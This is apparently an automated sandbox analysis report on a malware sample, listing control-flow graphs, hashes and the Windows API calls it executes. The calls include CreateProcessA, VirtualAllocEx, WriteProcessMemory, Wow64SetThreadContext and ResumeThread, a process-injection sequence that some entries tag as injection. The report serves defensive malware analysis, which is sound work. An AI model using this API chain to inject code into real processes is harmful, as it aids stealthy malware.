29910->29912 29912->29826 29914 7420eb0 Wow64SetThreadContext 29913->29914 29916 7420f3d 29914->29916 29916->29826 29918 7420e40 ResumeThread 29917->29918 29920 7420e71 29918->29920 29920->29831 29922 7420e00 ResumeThread 29921->29922 29924 7420e71 29922->29924 29924->29831 29926 7420f88 VirtualAllocEx 29925->29926 29928 7421005 29926->29928 29928->29846 29930 7420fc8 VirtualAllocEx 29929->29930 29932 7421005 29930->29932 29932->29846 29934 7421359 CreateProcessA 29933->29934 29936 742151b 29934->29936 29938 74212d0 29937->29938 29938->29938 29939 74214be CreateProcessA 29938->29939 29940 742151b 29939->29940 29942 7421183 ReadProcessMemory 29941->29942 29944 74211c7 29942->29944 29944->29888 29946 7421183 ReadProcessMemory 29945->29946 29948 74211c7 29946->29948 29948->29888 29717 13eac70 29721 13ead68 29717->29721 29726 13ead58 29717->29726 29718 13eac7f 29722 13ead9c 29721->29722 29723 13ead79 29721->29723 29722->29718 29723->29722 29724 13eafa0 GetModuleHandleW 29723->29724 29725 13eafcd 29724->29725 29725->29718 29727 13ead79 29726->29727 29728 13ead9c 29726->29728 29727->29728 29729 13eafa0 GetModuleHandleW 29727->29729 29728->29718 29730 13eafcd 29729->29730 29730->29718 29949 13ed650 DuplicateHandle 29950 13ed6e6 29949->29950 29951 13ed000 29952 13ed046 GetCurrentProcess 29951->29952 29954 13ed098 GetCurrentThread 29952->29954 29955 13ed091 29952->29955 29956 13ed0ce 29954->29956 29957 13ed0d5 GetCurrentProcess 29954->29957 29955->29954 29956->29957 29958 13ed10b 29957->29958 29959 13ed133 GetCurrentThreadId 29958->29959 29960 13ed164 29959->29960

                                Executed Functions

                                Function 073534B8 Relevance: 3.1, Strings: 2, Instructions: 562COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 44 73534b8-73534e0 45 73534e7-73535a3 44->45 46 73534e2 44->46 49 73535a5-73535cb 45->49 50 73535a8-73535b5 45->50 46->45 52 73535d1-73535fb 49->52 53 7353abb-7353afd 49->53 50->49 56 7353601-7353619 52->56 57 7353cc8-7353cd4 52->57 62 7353b00-7353b04 53->62 58 735361f-7353620 56->58 59 7353cda-7353ce3 56->59 57->59 61 7353cae-7353cba 58->61 65 7353ce9-7353cf5 59->65 63 7353625-7353631 61->63 64 7353cc0-7353cc7 61->64 66 73536d6-73536da 62->66 67 7353b0a-7353b10 62->67 70 7353633 63->70 71 7353638-7353653 63->71 76 7353cfb-7353d07 65->76 68 73536ec-73536f2 66->68 69 73536dc-73536ea 66->69 67->53 72 7353b12-7353b6d 67->72 74 7353737-735373b 68->74 73 735374a-735377c 69->73 70->71 71->65 75 7353659-735367e 71->75 91 7353ba4-7353bce 72->91 92 7353b6f-7353ba2 72->92 97 73537a6 73->97 98 735377e-735378a 73->98 78 73536f4-7353700 74->78 79 735373d 74->79 75->76 90 7353684-7353686 75->90 85 7353d0d-7353d14 76->85 81 7353707-735370f 78->81 82 7353702 78->82 84 7353740-7353744 79->84 88 7353734 81->88 89 7353711-7353725 81->89 82->81 84->73 86 73536bc-73536d3 84->86 86->66 88->74 94 7353689-7353694 89->94 95 735372b-7353732 89->95 90->94 105 7353bd7-7353c56 91->105 92->105 94->85 99 735369a-73536b7 94->99 95->79 104 73537ac-73537d9 97->104 101 7353794-735379a 98->101 102 735378c-7353792 98->102 99->84 106 73537a4 101->106 102->106 111 7353828-73538bb 104->111 112 73537db-7353813 104->112 119 7353c5d-7353c70 105->119 106->104 127 73538c4-73538c5 111->127 128 73538bd 111->128 120 7353c7f-7353c84 112->120 119->120 121 7353c86-7353c94 120->121 122 7353c9b-7353cab 120->122 121->122 122->61 129 7353916-735391c 127->129 128->127 130 73538c7-73538e6 129->130 131 735391e-73539e0 129->131 132 73538ed-7353913 130->132 133 73538e8 130->133 142 7353a21-7353a25 131->142 143 73539e2-7353a1b 131->143 132->129 133->132 144 7353a27-7353a60 142->144 145 7353a66-7353a6a 142->145 143->142 144->145 146 7353a6c-7353aa5 145->146 147 7353aab-7353aaf 145->147 146->147 147->72 149 7353ab1-7353ab9 147->149 149->62
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID: :$~
                                • API String ID: 0-2431124681
                                • Opcode ID: 50e5bfa454e1a6a586920cc71929814ab40a1514dd2e82c46bfc2eb8ea37a1b6
                                • Instruction ID: 7782783f6be60c71e6143a099fdca723663fe4e3821c70bd709b46cf3a77fc47
                                • Opcode Fuzzy Hash: 50e5bfa454e1a6a586920cc71929814ab40a1514dd2e82c46bfc2eb8ea37a1b6
                                • Instruction Fuzzy Hash: 4A4204B5A00218DFEB15CF69C984F99BBB2FF49304F1580E9E909AB261D7319D91DF00
                                Function 07352106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 152 7352106-735210a 153 7352acd-7352ae3 152->153 154 735210b-7352120 152->154 154->153 155 7352121-735212c 154->155 157 7352132-735213e 155->157 158 735214a-7352159 157->158 160 73521b8-73521bc 158->160 161 7352264-73522ce 160->161 162 73521c2-73521cb 160->162 161->153 200 73522d4-735281b 161->200 163 73520c6-73520d2 162->163 164 73521d1-73521e7 162->164 163->153 166 73520d8-73520e4 163->166 170 7352239-735224b 164->170 171 73521e9-73521ec 164->171 167 73520e6-73520fa 166->167 168 735215b-7352161 166->168 167->168 178 73520fc-7352105 167->178 168->153 172 7352167-735217f 168->172 182 7352251-7352261 170->182 183 7352a0c-7352ac2 170->183 171->153 174 73521f2-735222f 171->174 172->153 181 7352185-73521ad 172->181 174->161 196 7352231-7352237 174->196 178->152 181->160 183->153 196->170 196->171 278 7352832-73528c5 200->278 279 735281d-7352827 200->279 280 73528d0-7352963 278->280 279->280 281 735282d 279->281 282 735296e-7352a01 280->282 281->282 282->183
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID: D
                                • API String ID: 0-2746444292
                                • Opcode ID: 1cf0c116823de3d9de64a68fc1bbf8c8f03f7f3c8ce13df7fcf6382886d9eb3f
                                • Instruction ID: cbab8dc431995456f88893e3f9d4da26008530c8be03ddb7eef023358950bf12
                                • Opcode Fuzzy Hash: 1cf0c116823de3d9de64a68fc1bbf8c8f03f7f3c8ce13df7fcf6382886d9eb3f
                                • Instruction Fuzzy Hash: 9D52D774A112298FDB64DF64D998BAEBBB2FF89311F1041D9D50AA7350CB30AE81CF51
                                Function 013ECFF1 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 013ED07E
                                • GetCurrentThread.KERNEL32 ref: 013ED0BB
                                • GetCurrentProcess.KERNEL32 ref: 013ED0F8
                                • GetCurrentThreadId.KERNEL32 ref: 013ED151
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: c14f95bdccea853609ac53197794d059728d7b9472e64f83933643dc804236ff
                                • Instruction ID: 3223dd9d6dbba5f4c99f24e5598378a067339aa09738cc4b37fcfcfede9b2de4
                                • Opcode Fuzzy Hash: c14f95bdccea853609ac53197794d059728d7b9472e64f83933643dc804236ff
                                • Instruction Fuzzy Hash: 3A5165B49003498FEB18CFAAD548BEEBBF1EF48304F248469D419A73A1D7749884CB65
                                Function 013ED000 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 013ED07E
                                • GetCurrentThread.KERNEL32 ref: 013ED0BB
                                • GetCurrentProcess.KERNEL32 ref: 013ED0F8
                                • GetCurrentThreadId.KERNEL32 ref: 013ED151
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 827e68d12a0597280948f3f1f2353af0337020f738479ae22b10b955dd3dc0c7
                                • Instruction ID: b8ca05fc01e6efdeac4098f5bac85df889082a1be9f74041faf10cfcfe58b4f4
                                • Opcode Fuzzy Hash: 827e68d12a0597280948f3f1f2353af0337020f738479ae22b10b955dd3dc0c7
                                • Instruction Fuzzy Hash: 015156B4D003098FEB14CFAAD548BEEBBF1EF88314F248469D419A73A0D7749984CB65
                                Function 074212C5 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 307 74212c5-7421365 310 7421367-7421371 307->310 311 742139e-74213be 307->311 310->311 312 7421373-7421375 310->312 316 74213c0-74213ca 311->316 317 74213f7-7421426 311->317 314 7421377-7421381 312->314 315 7421398-742139b 312->315 318 7421383 314->318 319 7421385-7421394 314->319 315->311 316->317 321 74213cc-74213ce 316->321 325 7421428-7421432 317->325 326 742145f-7421519 CreateProcessA 317->326 318->319 319->319 320 7421396 319->320 320->315 322 74213d0-74213da 321->322 323 74213f1-74213f4 321->323 327 74213de-74213ed 322->327 328 74213dc 322->328 323->317 325->326 329 7421434-7421436 325->329 339 7421522-74215a8 326->339 340 742151b-7421521 326->340 327->327 330 74213ef 327->330 328->327 331 7421438-7421442 329->331 332 7421459-742145c 329->332 330->323 334 7421446-7421455 331->334 335 7421444 331->335 332->326 334->334 336 7421457 334->336 335->334 336->332 350 74215aa-74215ae 339->350 351 74215b8-74215bc 339->351 340->339 350->351 352 74215b0 350->352 353 74215be-74215c2 351->353 354 74215cc-74215d0 351->354 352->351 353->354 355 74215c4 353->355 356 74215d2-74215d6 354->356 357 74215e0-74215e4 354->357 355->354 356->357 360 74215d8 356->360 358 74215f6-74215fd 357->358 359 74215e6-74215ec 357->359 361 7421614 358->361 362 74215ff-742160e 358->362 359->358 360->357 364 7421615 361->364 362->361 364->364
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07421506
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: cfa08e26aa43c1652a551e2f7c2c0091df7fc3795e97ceb379ca63676e7a4809
                                • Instruction ID: f6542cc381507b2af33ca966e1e7880a7998dbad4b0a4124cd97019800971cbb
                                • Opcode Fuzzy Hash: cfa08e26aa43c1652a551e2f7c2c0091df7fc3795e97ceb379ca63676e7a4809
                                • Instruction Fuzzy Hash: D6A14DB1D0062EDFEB10CF68C841BDEBAB2AF44310F5585AAD809A7240DB749996DF91
                                Function 074212D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 365 74212d0-7421365 367 7421367-7421371 365->367 368 742139e-74213be 365->368 367->368 369 7421373-7421375 367->369 373 74213c0-74213ca 368->373 374 74213f7-7421426 368->374 371 7421377-7421381 369->371 372 7421398-742139b 369->372 375 7421383 371->375 376 7421385-7421394 371->376 372->368 373->374 378 74213cc-74213ce 373->378 382 7421428-7421432 374->382 383 742145f-7421519 CreateProcessA 374->383 375->376 376->376 377 7421396 376->377 377->372 379 74213d0-74213da 378->379 380 74213f1-74213f4 378->380 384 74213de-74213ed 379->384 385 74213dc 379->385 380->374 382->383 386 7421434-7421436 382->386 396 7421522-74215a8 383->396 397 742151b-7421521 383->397 384->384 387 74213ef 384->387 385->384 388 7421438-7421442 386->388 389 7421459-742145c 386->389 387->380 391 7421446-7421455 388->391 392 7421444 388->392 389->383 391->391 393 7421457 391->393 392->391 393->389 407 74215aa-74215ae 396->407 408 74215b8-74215bc 396->408 397->396 407->408 409 74215b0 407->409 410 74215be-74215c2 408->410 411 74215cc-74215d0 408->411 409->408 410->411 412 74215c4 410->412 413 74215d2-74215d6 411->413 414 74215e0-74215e4 411->414 412->411 413->414 417 74215d8 413->417 415 74215f6-74215fd 414->415 416 74215e6-74215ec 414->416 418 7421614 415->418 419 74215ff-742160e 415->419 416->415 417->414 421 7421615 418->421 419->418 421->421
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07421506
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 6deeb81b0c9b6723a6dab5667c40f600bfc3e874c5761e806adbf84e65b37b2e
                                • Instruction ID: e8cd44d8f6a3019b036d5af4ceb51433f9fda22eb7e234671910d982c9b43a3f
                                • Opcode Fuzzy Hash: 6deeb81b0c9b6723a6dab5667c40f600bfc3e874c5761e806adbf84e65b37b2e
                                • Instruction Fuzzy Hash: E3914EB1D0062EDFEB10CF68C840BDEBBB2BF44314F5585AAD809A7240DB749996DF91
                                Function 013EAD68 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 422 13ead68-13ead77 423 13ead79-13ead86 call 13ea08c 422->423 424 13eada3-13eada7 422->424 431 13ead9c 423->431 432 13ead88 423->432 425 13eadbb-13eadfc 424->425 426 13eada9-13eadb3 424->426 433 13eadfe-13eae06 425->433 434 13eae09-13eae17 425->434 426->425 431->424 477 13ead8e call 13eaff0 432->477 478 13ead8e call 13eb000 432->478 433->434 436 13eae3b-13eae3d 434->436 437 13eae19-13eae1e 434->437 435 13ead94-13ead96 435->431 438 13eaed8-13eaf98 435->438 439 13eae40-13eae47 436->439 440 13eae29 437->440 441 13eae20-13eae27 call 13ea098 437->441 472 13eaf9a-13eaf9d 438->472 473 13eafa0-13eafcb GetModuleHandleW 438->473 443 13eae49-13eae51 439->443 444 13eae54-13eae5b 439->444 442 13eae2b-13eae39 440->442 441->442 442->439 443->444 446 13eae5d-13eae65 444->446 447 13eae68-13eae71 call 13ea0a8 444->447 446->447 453 13eae7e-13eae83 447->453 454 13eae73-13eae7b 447->454 455 13eae85-13eae8c 453->455 456 13eaea1-13eaea5 453->456 454->453 455->456 458 13eae8e-13eae9e call 13ea0b8 call 13ea0c8 455->458 459 13eaeab-13eaeae 456->459 458->456 462 13eaeb0-13eaece 459->462 463 13eaed1-13eaed7 459->463 462->463 472->473 474 13eafcd-13eafd3 473->474 475 13eafd4-13eafe8 473->475 474->475 477->435 478->435
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 013EAFBE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: cab6da80f1f4295675fe55ff25810c8908b9cc266fdda7224d992cfaf6e3adf6
                                • Instruction ID: f69352de2ead45b0d4ee496fffa86027a19cdc45bffe8bf137421e306202eb01
                                • Opcode Fuzzy Hash: cab6da80f1f4295675fe55ff25810c8908b9cc266fdda7224d992cfaf6e3adf6
                                • Instruction Fuzzy Hash: FA713670A00B158FE725DF2AD05475ABBF1FF88308F108A2DD48AD7A90D775E949CB91
                                Function 013E590C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 479 13e590c-13e590e 480 13e5912 479->480 481 13e5910 479->481 482 13e5916-13e598c 480->482 483 13e5913-13e5915 480->483 481->480 485 13e598f-13e59d9 CreateActCtxA 482->485 483->482 487 13e59db-13e59e1 485->487 488 13e59e2-13e5a3c 485->488 487->488 495 13e5a3e-13e5a41 488->495 496 13e5a4b-13e5a4f 488->496 495->496 497 13e5a60 496->497 498 13e5a51-13e5a5d 496->498 500 13e5a61 497->500 498->497 500->500
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 013E59C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 52bc38d69512165e235f1dd0aaca59fe393a182245e6624849ab5c0915111ab2
                                • Instruction ID: e3fb4797de34839896269124dd850c682a566c27aeef15354ecb6249425a5ec0
                                • Opcode Fuzzy Hash: 52bc38d69512165e235f1dd0aaca59fe393a182245e6624849ab5c0915111ab2
                                • Instruction Fuzzy Hash: 9641F674C00729CBEB25DFAAC844BDDBBF5BF49308F20815AD409AB291DB716946CF50
                                Function 013E5A84 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 501 13e5a84-13e5a8f 503 13e5b09-13e5b3b 501->503
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1f91bc5830c3fdbaac207997d12e275e60a3357563f88d88195f77e3ad4120e0
                                • Instruction ID: bdc06de31baf7228ded60733364be8c4f007166b0e7ed7d3eef9f6d1811ff055
                                • Opcode Fuzzy Hash: 1f91bc5830c3fdbaac207997d12e275e60a3357563f88d88195f77e3ad4120e0
                                • Instruction Fuzzy Hash: 0A31AB79805769CFEF12DBA8C8497EDBBF0AF4632CF10814AD045AB292C775994ACB50
                                Function 013E44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 505 13e44b4-13e59d9 CreateActCtxA 509 13e59db-13e59e1 505->509 510 13e59e2-13e5a3c 505->510 509->510 517 13e5a3e-13e5a41 510->517 518 13e5a4b-13e5a4f 510->518 517->518 519 13e5a60 518->519 520 13e5a51-13e5a5d 518->520 522 13e5a61 519->522 520->519 522->522
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 013E59C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 93456498e4defcdab741fc915ba24c91f2c563ab58582882b2b571dbba32d312
                                • Instruction ID: 2e6716c4a4fcb93e10ce4ce6764786f60be4a964a871a92bd6a935167a106859
                                • Opcode Fuzzy Hash: 93456498e4defcdab741fc915ba24c91f2c563ab58582882b2b571dbba32d312
                                • Instruction Fuzzy Hash: 7741AF74C00729CBEB25DFAAC845BDDBBF5BF49308F20806AD409AB251DBB56945CF90
                                Function 07421040 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 523 7421040-7421096 526 74210a6-74210e5 WriteProcessMemory 523->526 527 7421098-74210a4 523->527 529 74210e7-74210ed 526->529 530 74210ee-742111e 526->530 527->526 529->530
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074210D8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: daad498c49f38a3802c3cffa63befb19702560feccb6f097433caea5886192c2
                                • Instruction ID: 8698194d3c46cfc72ad5968dbb83f1a48b28dae537c668df567c00643e8a1529
                                • Opcode Fuzzy Hash: daad498c49f38a3802c3cffa63befb19702560feccb6f097433caea5886192c2
                                • Instruction Fuzzy Hash: A12126B590035D9FDB10CFAAC881BEEBBF5FF48310F10842AE919A7240D7799955CBA0
                                Function 07421048 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 534 7421048-7421096 536 74210a6-74210e5 WriteProcessMemory 534->536 537 7421098-74210a4 534->537 539 74210e7-74210ed 536->539 540 74210ee-742111e 536->540 537->536 539->540
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074210D8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: f34a9f96b259ee6d92d59005bf306a88b4dea6be17abfacd2dafe11e77a973ae
                                • Instruction ID: a90ecd2fa05b5c340408d74198af5d4735bd5eac9a2dd101c4902564606bd65b
                                • Opcode Fuzzy Hash: f34a9f96b259ee6d92d59005bf306a88b4dea6be17abfacd2dafe11e77a973ae
                                • Instruction Fuzzy Hash: D82115B590035D9FDB10CFAAC880BDEBBF5FF48310F50842AE919A7240C7799955CBA0
                                Function 07420EA8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 544 7420ea8-7420efb 547 7420f0b-7420f3b Wow64SetThreadContext 544->547 548 7420efd-7420f09 544->548 550 7420f44-7420f74 547->550 551 7420f3d-7420f43 547->551 548->547 551->550
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07420F2E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 5c22a848bb62ba3e578ab2e89d439a8188da1cb7c027281cac6992b4d386525a
                                • Instruction ID: 7c47139637a4edad1e886ed8d8b3b1f2ee323d6df21b44f52abbc05044d272c6
                                • Opcode Fuzzy Hash: 5c22a848bb62ba3e578ab2e89d439a8188da1cb7c027281cac6992b4d386525a
                                • Instruction Fuzzy Hash: 24216AB1D003198FDB10CFAAC4817EEBBF4EF48314F54842AD819A7240DB78A946CFA0
                                Function 07420EB0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 555 7420eb0-7420efb 557 7420f0b-7420f3b Wow64SetThreadContext 555->557 558 7420efd-7420f09 555->558 560 7420f44-7420f74 557->560 561 7420f3d-7420f43 557->561 558->557 561->560
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07420F2E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 6ba35c6cdbfc0bf2188399ff7ba3ded1fd287fcfa3f451b4157462aff4926e25
                                • Instruction ID: 6b49c8b84fbd14bcd51d64d5ce3fede5b8a2da3889a8cb432dc9ce9c044998e2
                                • Opcode Fuzzy Hash: 6ba35c6cdbfc0bf2188399ff7ba3ded1fd287fcfa3f451b4157462aff4926e25
                                • Instruction Fuzzy Hash: AA2138B1D003198FDB10DFAAC4847EEBBF5EF48324F54842AD519A7240CB78A945CFA0
                                Function 07421138 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 565 7421138-74211c5 ReadProcessMemory 568 74211c7-74211cd 565->568 569 74211ce-74211fe 565->569 568->569
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074211B8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 05ff44aef9e206caadbe0b22ba21395b1dd62e1f6d404528e435728a5f0085e6
                                • Instruction ID: 94dd17b72d1691ce2a16966adbbf7350713db57f46a23f7312ef4f8a835a3c3d
                                • Opcode Fuzzy Hash: 05ff44aef9e206caadbe0b22ba21395b1dd62e1f6d404528e435728a5f0085e6
                                • Instruction Fuzzy Hash: EF2114B1D003599FDB10DFAAC880BEEBBF5FF48310F54842AE919A7250C7789955CBA0
                                Function 013ED650 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED6D7
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 78064ddae1936fec619e6712ef61cb7e115bcd5fdd3e7614ac66207887982d11
                                • Instruction ID: 212f2a702ada231210783e878e6d432eb5f25132d712931d5931b34799910739
                                • Opcode Fuzzy Hash: 78064ddae1936fec619e6712ef61cb7e115bcd5fdd3e7614ac66207887982d11
                                • Instruction Fuzzy Hash: F621E0B59003189FDB10CFAAD884ADEBBF8EB48320F14801AE918A7250C374A944CFA4
                                Function 013ED648 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED6D7
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1380121047.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_13e0000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 4828a62d29139e72e08b3bfa5bf2197789316094127540f1b9ff0280019d8143
                                • Instruction ID: be5c50e83195fd701e6e90ccfe409f40228dda255516c93213bd0950835654dd
                                • Opcode Fuzzy Hash: 4828a62d29139e72e08b3bfa5bf2197789316094127540f1b9ff0280019d8143
                                • Instruction Fuzzy Hash: 3E21E4B5D003599FDB10CFAAD584BDEBBF5EB48314F14841AE918A7350C374AA54CF64
                                Function 07421131 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074211B8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386248697.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7420000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 865d5fdfce1ecebaa36efade40dbe3bd80d85cc01ab24e0c6e09280fc80f79ed
                                • Instruction ID: 31f671f93dcd00ba38c93804d47a3a6cfb420e87d6b2cb01bdb6c513c12c7087
